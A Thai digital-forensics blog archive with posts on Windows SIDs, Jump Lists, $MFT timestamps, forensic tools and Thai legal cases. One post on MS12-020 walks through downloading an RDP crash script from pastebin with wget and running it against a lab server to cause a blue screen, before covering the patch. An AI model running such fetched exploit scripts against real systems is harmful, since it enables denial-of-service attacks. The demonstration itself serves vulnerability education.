Friday, November 30, 2012

DIGITAL FORENSICS: Security Identifier (SID)

DIGITAL FORENSICS: Security Identifier SID คือ


Security Identifier (SID) เป็นค่าที่ระบุถึง Object ประจำตัว User หรือ Account นั้น ๆ เพื่อใช้ระบุการรักษาความปลอดภัยในระบบปฏิบัติการ Windows (พูดง่าย ๆ คือเอาไว้เพื่อประกอบการตั้งค่าการควบคุมการเข้าถึงทรัพยากรในระบบ เช่นการใช้งาน Share Files หรือ ทรัพยากรอื่น ๆ ในระบบ)

DIGITAL FORENSICS: Security Identifier (SID)


DIGITAL FORENSICS: Security Identifier (SID)

DIGITAL FORENSICS: Security Identifier (SID)



wmic useraccount get name,sid

DIGITAL FORENSICS: Security Identifier (SID)
SID  wikihow.com

DIGITAL FORENSICS: Security Identifier (SID)

DIGITAL FORENSICS: Security Identifier (SID)


ตัวอย่าง SID Account ทั่วไป ของ System
S-1-1-0 Everyone
S-1-3-0 Creator Owner
S-1-5-1 Dialup
S-1-5-2 Network
S-1-5-3 Batch
S-1-5-4 Interactive
S-1-5-7 Anonymous
S-1-5-9 Enterprise Domain Controllers
S-1-5-11 Authenticated Users
S-1-5-13 Terminal Server Users
ตัวอย่าง SID Account ทั่วไปของ User
S-1-5-{Domain}-500 Administrator
S-1-5-{Domain}-501 Guest
S-1-5-{Domain}-512 Domain Admins
S-1-5-{Domain}-513 Domain Users
S-1-5-{Domain}-514 Guests
S-1-5-{Domain}-515 Domain Computers
S-1-5-{Domain}-516 Domain Controllers
S-1-5-{Domain}-518 Schema Admins
S-1-5-{Domain}-519 Enterprise Admins
S-1-5-{Domain}-544 Administrators
S-1-5-{Domain}-545 Users
DIGITAL FORENSICS: Security Identifier (SID)
http://www.mvpskill.com

S = ค่าของ String ที่ระบุว่าเริ่มต้น SID
1 = ค่า Version ของ SID นั้น ๆ
5 = ค่าระบุ Identifier
21-3273191534-3683084754-2821217130 = ค่า SID ของ Local Computer หรือ Domain Computer ประจำเครื่อง หรือ ประจำ Domain
500 = สิทธิของ SID นั้น ๆ เช่น 500 หมายถึงได้สิทธิเป็น Administrator (สามารถนำไปหาค่าได้จากตารางเบื้องต้นด้านบน)
ที่มา: By Suttipan Passornmvpskill  https://bit.ly/2Evrys3

หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น


* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ
#windowsforensics #WindowsForensic #ComputerForensics #dfir #forensics #digitalforensics #computerforensic #investigation #cybercrime #fraud

Digital Forensics: ตัวอย่างคดี พยานหลักฐานดิจิทัล

Digital Forensics:  ตัวอย่างคดี พยานหลักฐานดิจิทัล

Digital Forensics: Case Study 

#ความลับทางการค้า

      คำพิพากษาศาลฎีกาที่ 1323/2560
      พ.ร.บ.ความลับทางการค้า พ.ศ.2545 ม. 3

พ.ร.บ.ความลับทางการค้า พ.ศ.2545 มาตรา 3 บัญญัตินิยามของความลับทางการค้าว่า "ข้อมูลการค้าซึ่งยังไม่รู้จักกันโดยทั่วไป หรือยังเข้าถึงไม่ได้ในหมู่บุคคลซึ่งโดยปกติแล้วต้องเกี่ยวข้องกับข้อมูลดังกล่าว โดยเป็นข้อมูลที่มีประโยชน์ในเชิงพาณิชย์เนื่องจากเป็นความลับ และเป็นข้อมูลที่ผู้ควบคุมความลับทางการค้าได้ใช้มาตรการที่เหมาะสมเพื่อรักษาไว้เป็นความลับ" โจทก์จึงมีหน้าที่นำสืบว่าข้อมูลเกี่ยวกับรายชื่อ ที่อยู่ และราคาค่าจ้างขนส่งตามฟ้อง ที่โจทก์กล่าวอ้างว่าเป็นความลับทางการค้า มีลักษณะครบถ้วนที่จะเป็นความลับทางการค้าตามที่มาตรา 3 ดังกล่าวกำหนดไว้ การที่พนักงานบริษัทโจทก์คนอื่นนอกเหนือจากจำเลยที่ 2 สามารถเข้าถึงข้อมูลเกี่ยวกับรายชื่อ ที่อยู่ และราคาค่าจ้างขนส่งทั้งที่เป็นเอกสาร และเป็นข้อมูลในเครื่องคอมพิวเตอร์แสดงว่าโจทก์ไม่ได้ใช้มาตรการที่เหมาะสมเพื่อรักษาข้อมูลดังกล่าวไว้เป็นความลับ ข้อมูลเกี่ยวกับรายชื่อ ที่อยู่ และราคาค่าจ้างขนส่งตามฟ้องโจทก์ จึงไม่ใช่ความลับทางการค้า ตาม พ.ร.บ.ความลับทางการค้า พ.ศ.2545 มาตรา 3


#เค้าโครงบรรยาย  วิชา กฎหมายเกี่ยวกับอินเตอร์เน็ต  Download


#มาตรา 25 ธุรกรรมทางอิเล็กทรอนิกส์ใดที่ได้กระทำตามวิธีการแบบปลอดภัยที่กำหนดในพระราชกฤษฎีกา ให้สันนิษฐานว่าเป็น วิธีการที่เชื่อถือได้
#ว่าด้วยวิธีการแบบปลอดภัยในการทำธุรกรรมทางอิเล็กทรอนิกส์พ.ศ. ๒๕๕๓  Download

#การรับฟังและวิธีการนําสืบพยานหลักฐานอิเล็กทรอนิกส์ในคดีอาญา :ศึกษาตามพระราชบัญญัติว่าด้วยการกระทําความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. 2550 Donwload
 #พยานหลักฐานที่ได้มาจากเฟซบุ๊ก : คำพิพากษาฎีกาที่ 15386/2558  Download



ข้อสังเกต พยานหลักฐานที่ได้มาโดยวิธีการล่อให้กระทำความผิด (ENTRAPMENT)

คำพิพากษาศาลฎีกาที่ 4065/2545 และ 4301/2543




หน่วยที่ 12
    การรับฟังพยานหลักฐานในคดัอาญา ศาสตราจารย์พิเศษ ภัทรศักดิ์ วรรณแสง
ที่มา: https://bit.ly/2WBIS6g



#แห่แจ้งป.จับ นายหน้าประกันภัยรถ

คปภ.พร้อมตัวแทนบริษัทประกันภัย 10 บริษัท และผู้เสียหายถูกหลอกซื้อประกันภัยรถยนต์ 30 คน สูญกว่า 5 ล้านบาท โร่ร้องกองปราบฯ ให้ดำเนินคดีบริษัทนายหน้าหลอกขายประกันและสาวแสบตัวแทนขาย แฉเหยื่อหลงเชื่อ เพราะเห็นกับการผ่อนได้โดยไม่เสียดอกเบี้ยหรือเสนอขายในราคาถูก แนะให้หาข้อมูลบริษัทนายหน้าก่อน ตร.เตือน อย่าไปหลงเชื่อกับโปรโมชั่นพิเศษ

เหยื่อประกันภัยรถยนต์แจ้งจับบริษัทนายหน้าหลอกขายประกันและตัวแทนขาย เปิดเผยขึ้นที่กองบังคับการปราบปราม เมื่อเวลา 10.00 น. วันที่ 24 ม.ค. นายตนุภัทร รัตนพูลชัย รองเลขาธิการด้านกฎหมาย คดีและคุ้มครอง สำนักงานคณะกรรมการกำกับและส่งเสริมการประกอบธุรกิจประกันภัย (คปภ.) พร้อมตัวแทนบริษัทประกันภัย 10 บริษัท และผู้เสียหายถูกหลอกซื้อประกันภัยรถยนต์ 30 คน มูลค่าความเสียหาย 5 ล้านบาท เข้าพบ พ.ต.อ.ชาคริต สวัสดี รอง ผบก.ป. แจ้งความดำเนินคดีกับบริษัท ที.ไอ.เอส. ควอลิตี้ แมเนจเม้นท์ จำกัด และ น.ส.จุฑาภาส อังกาพย์ ฐานะกรรมการบริษัท ในฐานความผิดกระทำ การเป็นตัวแทนประกันวินาศภัยหรือนายหน้าประกัน วินาศภัยโดยไม่ได้รับอนุญาตจากนายทะเบียน โดยนำ เอกสารหลักฐานการโอนเงินของผู้เสียหาย มามอบให้พนักงานสอบสวนประกอบพิจารณาคดี

ที่มา:โดย ไทยรัฐฉบับพิมพ์
25 ม.ค. 2561 05:15 น.
https://bit.ly/2HYRX49



ทั้งนี้ จากการหารือของบริษัทประกันภัยที่ได้รับความเสียหายจากการกระทำของบริษัท ถูกกล่าวหา จำกัด มีความเห็นสอดคล้องกันว่า กรณีที่บริษัท ถูกกล่าวหา จำกัด กระทำการใช้เอกสารใบคำขอเอาประกันภัย ซึ่งไม่ใช่เอกสารของบริษัทประกันภัย เป็นการกระทำที่น่าจะเกิดความเสียหายแก่ผู้อื่นหรือประชาชน เป็นความผิดฐานปลอมเอกสาร ซึ่งบริษัทประกันภัยจะดำเนินการร้องทุกข์ต่อพนักงานสอบสวนต่อไป อีกทั้งบริษัทประกันภัยที่ได้รับความเสียหายจากกรณีที่บริษัท ถูกกล่าวหา จำกัด กระทำการใช้ตราสัญลักษณ์ของบริษัทลงโฆษณาในเว็บไซต์ www.ถูกกล่าวหา .com อาจทำให้ประชาชนเข้าใจผิดและหลงเชื่อว่าบริษัท ถูกกล่าวหา จำกัด เป็นตัวแทนหรือนายหน้าประกันภัยที่ได้รับมอบหมายจากบริษัท ซึ่งไม่เป็นความจริง เป็นความผิดตามมาตรา 14 (1) แห่งพระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ (ฉบับที่ 2) พ.ศ. 2560 และบริษัทประกันภัยทุกบริษัทพร้อมที่จะดำเนินการตามกฎหมายกับบริษัท ถูกกล่าวหา จำกัด ให้ถึงที่สุด
 - ฉ้อโกงประชาชนและฟอกเงิน
- ข้อหาใช้หรือแสดงตัวเป็นประกันภัยโดยผิดกฎหมาย   
- เป็นนายหน้านิติบุคคลโดยไม่ได้รับอนุญาต 
- พรบคอม.
ที่มา:https://bit.ly/2HR1YRI
Download



หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ

#หลักฐานดิจิทัล #hashvalue #WindowsForensic #computerforensic #ComputerForensics #dfir #forensics #digitalforensics #investigation #cybercrime #fraud #พยานหลักฐานดิจิทัล

Saturday, October 27, 2012

Digital Forensics:Jump list

Digital Forensics:Jump list

Jump list เป็นคุณลักษณะที่นำมาใช้ใน Windows 7 ช่วยให้คุณสามารถดูเอกสารล่าสุดในโปรแกรมที่ถูก Pin ไว้ที่ทาสก์บาร์ของคุณ รูปภาพเป็นตัวอย่างของJump listใน Windows 7 

Jump Lists ที่ว่านี่ จะเป็นรายการทางลัดการแสดงผลประวัติรายการที่เคยถูกเรียกใช้งานบ่อยๆ ไม่ว่าจะเป็นไฟล์เอกสาร Microsoft Office, เว็บเบราว์เซอร์, File Explorer, โปรแกรมมัลติมีเดีย, Text Editor ต่างๆ, ฯลฯ โดยเมื่อมีการเปิดเรียกใช้งานตัวโปรแกรม แล้วผู้ใช้งานสั่งคลิกขวาที่ทาสก์บาร์ ก็จะมีประวัติรายการรายชื่อไฟล์ที่เคยถูกเรียกใช้งานแสดงขึ้นมา

Jump list ทำหน้าที่เก็บรายการไฟล์ล่าสุดที่เราเรียกเปิดโปรแกรมต่างๆ มาว่าจะเป็นไฟล์เอกสาร ไฟล์เพลง ไฟล์วิดีโอ หรือไฟล์อื่นๆ เราเพียงคลิกขวาที่ไอคอน Windows Explorer ที่ Taskbar ก็จะเห็นรายการไฟล์ที่เรียกใช้ จุดประสงค์ของฟีเจอร์นี้ก็เพื่อให้ผู้ใช้คลิกเลือกไฟล์ที่เคยเปิดใช้แล้วที่นี่ ในกรณีที่ต้องการใช้ใหม่ในครั้งต่อไป จะได้รวดเร็วไม่ต้องไปคลิกที่ตัวไฟล์หรือโปรแกรม แต่ถ้าคุณเป็นคนที่ไม่ต้องการให้คนอื่นมาคลิกดูว่าคุณเคยเปิดใช้ไฟล์อะไรมาก่อน ก็สามารถเอาชื่อไฟล์ออกจากรายการได้

วิธีล้างรายการไฟล์ทำได้ดังนี้
ให้คลิกขวาที่ไอคอน Windows Explorer ที่ Taskbar ?จะมีรายการไฟล์แสดงออกมาให้คลิกขวาที่รายการที่ต้องการเอาออกเลือกคำสั่ง Remove form this list

 
รูปจาก notebookspec.com

 

ในกรณีที่ไม่ต้องการให้ Jump List จำค่าการใช้งานไฟล์เลย ก็ทำได้โดย ให้คลิกขวาที่ Taskbar เลือกคำสั่ง Properties ที่หน้าต่าง Taskbar Properties มาที่แท็บ Jump Lists ให้คลิกเอาเครื่องหมายถูกออกจาก
Store recently opened programs และ Store and display recently opened items in Jump Lists แล้วคลิก OK

 

รูปจาก notebookspec.com

 Jump List files are created on a per user basis, and located (the AppData directory is hidden by default from the user):
\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\

%systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations

Episode 16: “Quick Win” files #2 - Jumplists-Part 1

Episode 17: “Quick Win” files #2 - Jumplists-Part 2

 

 

ref:

jumplist

notebookspec.com jump-list

forensic-analysis-of-windows-7-jump-lists/

windows-10-jump-list-forensics/ 


ศึกษาเพิ่มเติม Windows Artifacts Jump list(Part II)


#WindowsForensic #ComputerForensics #dfir #forensics #digitalforensics #computerforensic #investigation #cybercrime #fraud


หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น
* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ

Sunday, October 7, 2012

Digital Forensics:When a partition was created/Modify (Master File Table)

Digital Forensics:When a partition was created/Modify (Master File Table)


 วันนี้มาดูวิธีตรวจสอบ เวลาที่พาร์ติชั่นถูกสร้างขึ้นและวันเวลาที่ติดตั้ง windows

MFT หรือ Master File Table เป็นไฟล์ในระบบไฟล์แบบ NTFS โดยจะรวบรวมข้อมูลของไฟล์ รายละเอียดของไฟล์และไดเร็กทอรี่ทั้งหมด ในไดร์ฟนั้นๆ

ตัวอย่างที่ 1 $MFT  Master File Table   Date Create 26-3-2012

ตัวอย่างที่ 1 Windows XP 

$MFT  Master File Table   Date Create 26-3-2012

                                          Date Modify 26-3-2012

                                          Date Access 26-3-2012

โดยปกติไฟล์ $MFT จะถูกสร้างขึ้นโดยอัตโนมัติเมื่อมีการฟอร์แมตหรือเปลี่ยนพาร์ติชันของดิสก์เป็น NTFS โดยวันที่และเวลาที่ไฟล์ $MFT ถูกสร้างขึ้น (หรือวันที่และเวลาที่ดิสก์ถูกฟอร์แมต) จะถูกระบุอยู่ในคุณลักษณะของไฟล์ $MFT ที่หัวข้อ Date created ซึ่งในกรณีโดยส่วนใหญ่ที่ดิสก์ดังกล่าวถูกติดตั้งระบบปฏิบัติการ ไฟล์ของระบบปฏิบัติการจะมีวันที่และเวลาที่ถูกสร้างใกล้เคียงหรือสอดคล้องกับค่า Date created ใน $MFT ตามรูปภาพ ตัวอย่างที่ 1

Original Install Date:
Windows Original Install Date: 26-3-2012

ตัวอย่างที่ 2 Windows Original Install Date: 24-9-2019    

ตัวอย่างที่ 2  Windows 7 Professional 

$MFT  Master File Table   Date Create: 24-9-2019

           Windows Original Install Date:     24-9-2019                         


จุดสังเกต
 1 .  $MFT  Master File Table   (MAC TIme)
 2.  Systeminfo (Original Install Date)
 3.  Volume Serial Number  ของ Partition



อ่านเพิ่มเต้ิม

หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ

#WindowsForensic #ComputerForensics #dfir #forensics #digitalforensics #computerforensic #investigation #cybercrime #fraud

Friday, September 21, 2012

IT Security:Security Update MS12-020 Remote Desktop

IT Security: Security Update MS12-020 Remote Desktop

Microsoft Security Bulletin MS12-020 - Critical คือ ช่องโหว่ที่ร้ายแรง อนุญาตให้เรียกใช้โค้ดจากระยะไกลได้ หากผู้โจมตีส่งลำดับของแพ็กเก็ต RDP ที่ออกแบบมาเป็นพิเศษไปยังระบบที่ได้รับผลกระทบ โดยค่าเริ่มต้น Remote Desktop Protocol (RDP)

ทดสอบช่องโหว่  โดยเตรียมเครื่องมือดังนี้

  • Kali
  • Python2
  • Windows2008
  • RDPkill.py

Kali# wget -O RDPkill.py http://www.pastebin.com/raw.php?i=G99npvDy 

#chmod 777 RDPkill.py

File RDPkill.7z  ps: 1234 

#python (python2) RDPkill.py 192.168.18.131

Security Update MS12-020

MS12-020 / CVE-2012-0002 Vulnerability

ตรวจสอบเครื่องเป้าหมาย windows server 2008 IP192.168.18.131
Security Update MS12-020

ตรวจสอบว่าเครื่องเป้าหมาบเปิดการทำงาน Remote Desktop


# sudo python2 RDPkill.py 192.168.18.131

ผลการโจมตีทำให้เครื่องเป้าหมายขึ้น  Blue screen

Microsoft Security Bulletin MS12-020
MS12-020 / CVE-2012-0002 Vulnerability

แก้ไขโดย

Microsoft ได้ประกาศ Security Bulletin MS12-020 เพื่อ แจ้งเตือนผู้ใช้งานระบบปฏิบัติการ Windows ทุกเวอร์ชัน ให้ ทำการติดตั้งแพทช์ KB2621440 เพื่อแก้ไขปัญหาช่องโหว่ CVE-2012-0002 ซึ่งอนุญาตให้ผู้ไม่หวังดีส่งแพ็กเกจ RDP (Remote Desktop Protocol) เข้ามายังระบบ เพื่อสั่งให้ ประมวลผลคำสั่งที่ไม่พึงประสงค์จากระยะไกลได้ (Remote Code Execution) [10-1] อย่างไรก็ตาม ถึงแม้ว่าช่องโหว่ดังกล่าวได้ถูกแจ้งมายัง Microsoft โดยตรง และเชื่อว่า ไม่ได้มีการเปิดเผยราย

โดยออกคำแนะนำให้ติดตั้งลงบน Windows ทุกเครื่อง (แม้ว่าไม่ได้ enable RDP ก็ตาม)  ใน Update นี้ มี 2 ไฟล์ (KB2621440 และ KB2667402 )


ที่มา:     security-updates/securitybulletins/2012/ms12-020
                 
             Security-update-ms12-020

#WINDOWSFORENSIC #COMPUTERFORENSICS #DFIR #FORENSICS #DIGITALFORENSICS #COMPUTERFORENSIC #INVESTIGATION #CYBERCRIME #FRAUD #หลักสูตรการพิสูจน์หลักฐานทางดิจิทัล


หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง ADMIN เพื่อแก้ไขต่อไป
ขอบคุณครับ

Friday, May 18, 2012

Digital Forensics:ถอดรหัสนิติวิทยาศาสตร์

Digital Forensics:ถอดรหัสนิติวิทยาศาสตร์

แนะนำหนังสือเรื่อง  ถอดรหัสนิติวิทยาศาสตร์

สืบเบาะแส ท้าคดี อาชญากรรมสุดระทึก!

ผู้เขียน    Alex Frith (อเล็กซ์ ฟริท)
ผู้แปล    พลอย สืบวิเศษ  

เนื้อหาโดยสังเขป
    หนังสือเล่มนี้อธิบายกระบวนการทำงานของนิติวิทยาศาสตร์ที่หลายคนคิดว่าเป็นเรื่องยากให้เข้าใจง่ายขึ้น ด้วยภาษาที่ไม่ซับซ้อน เนื้อหาที่กระชับ ความรู้แปลกใหม่ และการไขคดีอาชญากรรมที่ชวนทึ่งจากทั่วโลก สำหรับคนทั่วไปที่ไม่รู้จักเรื่องนิติวิทยาศาสตร์มาก่อน หนังสือเล่มนี้เหมาะแก่การศึกษา และหากใครที่สนใจเกี่ยวกับเรื่องนี้ "ถอดรหัสนิติวิทยาศาสตร์" เป็นหนังสืออีกเล่มที่ไม่ควรพลาดด้วยประการทั้งปวง      
สืบคดีสไตล์ CSI

รูปภาพจาก หนังสือ ถอดรหัสนิติวิทยาศาสตร์

  • สารบัญ
  • บทที่ 1 วิทยาศาสตร์และกฎหมาย
  • บทที่ 2 สืบจากเหงื่อ
  • บทที่ 3 ล้วงลับคราบเลือด
  • บทที่ 4 ความลับในเซลล์
  • บทที่ 5 ศพให้การ
  • บทที่ 6 เงื่อนงำจากธรรมชาติ
  • บทที่ 7 จิ๋วแต่แจ๋ว
  • บทที่ 8 พุ่งไปกับกระสุนปืน
  • บทที่ 9 ชำแหละระเบิด
  • บทที่ 10 เบาะแสจากเอกสาร
  • บทที่ 11 รูปพรรณของอาชญากร
  • ฯลฯ

คำนิยม
ถอดรหัสนิติวิทยาศาสตร์ อธิบายกระบวนการทำงานของนิติวิทยาศาสตร์ที่หลายคนคิดว่าเป็นเรื่องยากให้เข้าใจง่ายขึ้น ด้วยภาษาที่ไม่ซับซ้อน เนื้อหาที่กระชับ ความรู้แปลกใหม่ และการไขคดีอาชญากรรมชวนทึ่งจากทั่วโลก
    -- แพทย์หญิง คุณหญิงพรทิพย์ โรจนสุนันท์ --
            ผู้อำนวยการสถาบันนิติวิทยาศาสตร์


การตามรอยทางอิเล็กทรนิกส์

               คนทั่วไปยังคงใช้ลายเซ็นป้องกันการปลอมแปลงเอกสาร แต่การเก็บข้อมูลสำคะญไว้ในคอมพิวเตอร์ก็เป็นสิ่งสำคัะญที่ทำกันมากขึ้น โดยมีการป้องกัน เช่น การใส่รหัส หรือ การใช้เลขรหัสประจำตัว (Personal Identifivation Number: PIN) เพื่อรักษาความปลอดภัย
     ช่วงสองทศวรรษที่ผ่านมา อาชญากรรมประเภทใหม่นี้เกิดขึ้นเป็นประจำ นั้นคื การฉ้อโองทางเล็กทรอนิกส์ (electronic fraud) ผู้รู้วิธีใช้คอมพิวเตอร์โดยเฉพาะการใช้อินเทอร์เน็ตสามารถสวนรวยเป็นบุคคลอื่นและเจาะฐานข้อมูลคอมพิวเตอร์ส่วนบุคคลเพื่อขโมยข้อมูล และนำไปเปิดเข้าระบบบัญชีธนาคารของคนหนึ่งเพื่อขโมยเงิ้นทั้งหมดได้
               นักนิติคอมพิวเตอร์ต้องมีความรู้เหนือกว่าอาชญากรคอมพิวเตอร์เสมอ โชคดีที่ส่วนใหญ่แล้วมักมีหลักฐานมากพอให้นักนิติคอมพิวเตอร์ตรวจสอบ ทุกครั้งที่มีคนใช้คอมพิวเตอร์ จะมีการบันทึกไว้ในหน่วยความจำเพื่อให้ตรวจสอบคำสั่งที่ใช้งานและเวลาที่ใช้ได้สำหรับคนส่วนใหญ่ ข้อมูลเหล่านี้อาจเป็นแค่ตัวอักษรที่อ่านไม่เข้าใจ แต่ผู้เชี่ยวเข้าใจข้อมูลเหล่านี้
               แม้จะลบข้อมูลในหน่วยความจำของคอมพิวเตอร์ไปแล้ว ตราบใดที่ยังไม่มีการใส่ข้อมูลใหม่  หรือคอมพิวเตอร์ยังไม่ถูกทำลาย ข้อมูลเหล่านี้ยังคงอยู่  นักวิทยาศาสตร์ตรวจสอบวงจรคอมพิวเตอร์เพื่อระบุคำสั่งที่ใช้เมื่อเร็วๆนี้  และกู้แฟ้มเอกสารที่ถูกลบทิ้งได้  การค้นหาข้อมูลเพื่อตรวจหาหลักฐานที่เป็นประโยชน์นับเป็นศาสตร์อย่างหนึ่งเรียกว่า การกู้ข้อมูล (information retrieval)
               นักนิติคอมพิวเตอร์อีกส่วนหนึ่งคอยตรวจสอบการใช้งานบนอินเทอร์เน็ต โดยตรวจเว็บไซต์ที่น่าสงสัยหรือผิดกฎหมายเพื่อหาตัวคนเปิดเว็บไซต์และยังตรวจสอบคอมพิวเตอร์ของผู้สงสัยเพื่อดูรายชื่อเว็บไซต์ที่ผู้สงสัยเข้าไปดูได้  เช่น ตรวจสอบว่าผู้ต้องสงสัยเป็นสมาชิกกลุุ่มก่อการร้ายหรือไม่

โจรเคราะห์ร้าย
โทรศัพท์รุ่นใหม่มักมีระบบติดตามบอกตำแหน่ง (Global Positioning System : GPS) ซึ่งชิปที่เจ้าของเครื่องสามาถเปิดทำงานเพื่อบอกตำแหน่งที่อยู่ได้นอกจากนี้ยังมีประโยชน์ต่อการตามหาเครื่องโทรศัพท์ได้ด้วย เหมือนที่จอห์น บีย์รเล ทูตชาวเอมริกัน พบโทรศัพท์ของเขาในสนามบินบัลแกเรีย เมือ ค.ศ 2005

รูปภาพจาก หนังสือ ถอดรหัสนิติวิทยาศาสตร์



ที่มา:
se-ed ถอดรหัสนิติวิทยาศาสตร์ 
ถอดรหัสนิติวิทยาศาสตร์

หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ


#WindowsForensic #ComputerForensics #dfir #forensics #digitalforensics #computerforensic #investigation #cybercrime #fraud







Monday, May 14, 2012

Digital Forensics: Search by Image

Digital Forensics: วิธีค้นหาด้วยรูปภาพที่คล้ายกัน บน Google Image
Star Wars Episode I
Reverse.photos — upload an image and find similar pictures on the web.

  • โดยเปิดเว็บเบราว์เซอร์ (เช่น IE , Safari, Chrome) แล้วไปที่อยู่เว็บ mobile-reverse-image-search  ก็จะเข้าสู่หน้า Search By Image  
  • จากนั้น แตะที่ [ UPLOAD ] มือถือของคุณก็จะเปิดแอพ Gallery (รูปภาพ) ให้คุณเลือกภาพถ่าย หรือภาพที่คุณเคย save บนมือถือ เลือกมาสักรูปนึง

Reverse.photos



Show Matches

  • เมื่อเลือกภาพเสร็จแล้วให้แตะที่ [ SHOW MATACHES ] เพื่อค้นหาภาพคล้ายได้เลย ก็จะแสดงผลลัพธ์ภาพคล้ายกันกับภาพที่คุณเลือก บนมือถือของคุณ วิธีนี้สามารถตรวจสอบที่มาของภาพคล้ายกัน นี้ได้ผ่านทางมือถือได้ทันที

Search by Image

 Ref.  TheNextWeb , it24hrs 


หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ

#WindowsForensic #computerforensic #ComputerForensics #dfir #forensics
#digitalforensics #investigation #cybercrime #fraud

Monday, May 7, 2012

Digital Forensics:Forensic Tools

Computer Forensic Tools
      

Disk tools and data capture

Name
From
Description
MoonSols
Generates physical memory dump of Windows machines, 32 bits 64 bit. Can run from a USB flash drive.
Guidance Software
Create EnCase evidence files and EnCase logical evidence files [direct download link]
Magnet Forensics
Checks local physical drives on a system for TrueCrypt, PGP, or Bitlocker encrypted volumes
4Discovery
Edit EWF (E01) meta data, remove passwords (Encase v6 and earlier)
Ridgecrop
Enables large capacity disks to be formatted as FAT32
Web Content Protection Association
Browser designed to forensically capture web pages
AccessData
Imaging tool, disk viewer and image mounter
vogu00
Multi-threaded GUI imager under running under Linux
Kazuyuki Nakayama
Safely remove SATA disks similar to the “Safely Remove Hardware” icon in the notification area
CERT
Allows examiner to boot dd images in VMware.
Paraben
Mount forensic images as read-only local logical and physical disks
Belkasoft
Extracts RAM dump including that protected by an anti-debugging or anti-dumping system. 32 and 64 bit builds
Passmark Software
Boot utility for CD/DVD or USB flash drives to create dd or AFF images/clones.
Passmark Software
Mounts a wide range of disk images. Also allows creation of RAM disks
Tableau
Imaging tool for use with Tableau imaging products
Microsoft
Converts raw disk images to VHD format which are mountable in Windows Disk Management

Email analysis

Name
From
Description
Lepide Software
Open and view (not export) Outlook EDB files without an Exchange server
MiTeC
Viewer for Outlook Express, Windows Mail/Windows Live Mail, Mozilla Thunderbird message databases and single EML files
Lepide Software
Open and view (not export) Outlook OST files without connecting to an Exchange server
Lepide Software
Open and view (not export) Outlook PST files without needing Outlook




General

Name
From
Description
Mythicsoft
Search multiple files using Boolean operators and Perl Regex
Blackthorn
Contemporaneous notes recorder
NIST
Collated forensic images for training, practice and validation
Nuix
Copies data between locations, with file comparison, verification, logging
Shirouzu Hiroaki
Self labelled ‘fastest’ copy/delete Windows software. Can verify with SHA-1, etc.
Gary Kessler
Table of file signatures
Nirsoft
Calculate MD5 and SHA1 hashes
Mobatek
Run Linux live CDs from their ISO image without having to boot to them
Arkane Systems
Automatically moves mouse pointer stopping screen saver, hibernation etc.
Notepad ++
Advanced Notepad replacement
NIST
Hash sets of ‘known’ (ignorable) files
Ted Technology
A Linux & Windows GUI for individual and recursive SHA1 hashing of files
DSi
Enables software write-blocking of USB ports
Sécurité Multi-Secteurs
Software write blocker for Windows XP through to Windows 8
Troy Larson
Guide by Brett Shavers to creating and working with a Windows boot CD

File and data analysis

Name
From
Description
Allan Hay
Reads Windows XP,Vista and Windows 7 prefetch files
David Kovar
Parses the MFT from an NTFS file system allowing results to be analysed with other tools
Various
Detects full and partial multimedia files in unallocated space
Ted Technology
Recursively parses headers of every eCryptfs file in selected directory. Outputs encryption algorithm used, original file size, signature used, etc.
Passware
Scans a computer for password-protected & encrypted files, reports encryption complexity and decryption options for each file
Phil Harvey
Read, write and edit Exif data in a large number of file types
Sanderson Forensics
View various picture formats, image enhancer, extraction of embedded Exif, GPS data
Mandiant
Examine log files using text, graphic or histogram views
4Discovery
Recursively parses folders extracting 30+ attributes from Windows .lnk (shortcut) files
Nirsoft
View and export Windows Live Messenger contact details
EMC
Network packet capture and analysis
Mandiant
Acquire and/or analyse RAM images, including the page file on live systems
4Discovery
Recursively parses folders to extract meta data from MS Office, OpenOffice and PDF files
Sanderson Forensics
Displays and decodes contents of an extracted MFT file
NetGrab
Network monitoring tool, with covert “silent port scanning”
Mike’s Forensic Tools
Lists EXIF, and where available, GPS data for all photographs present in a directory. Export data to .xls or Google Earth KML format
Microsoft
Suite of command-line Windows utilities
Shadow Explorer
Browse and extract files from shadow copies
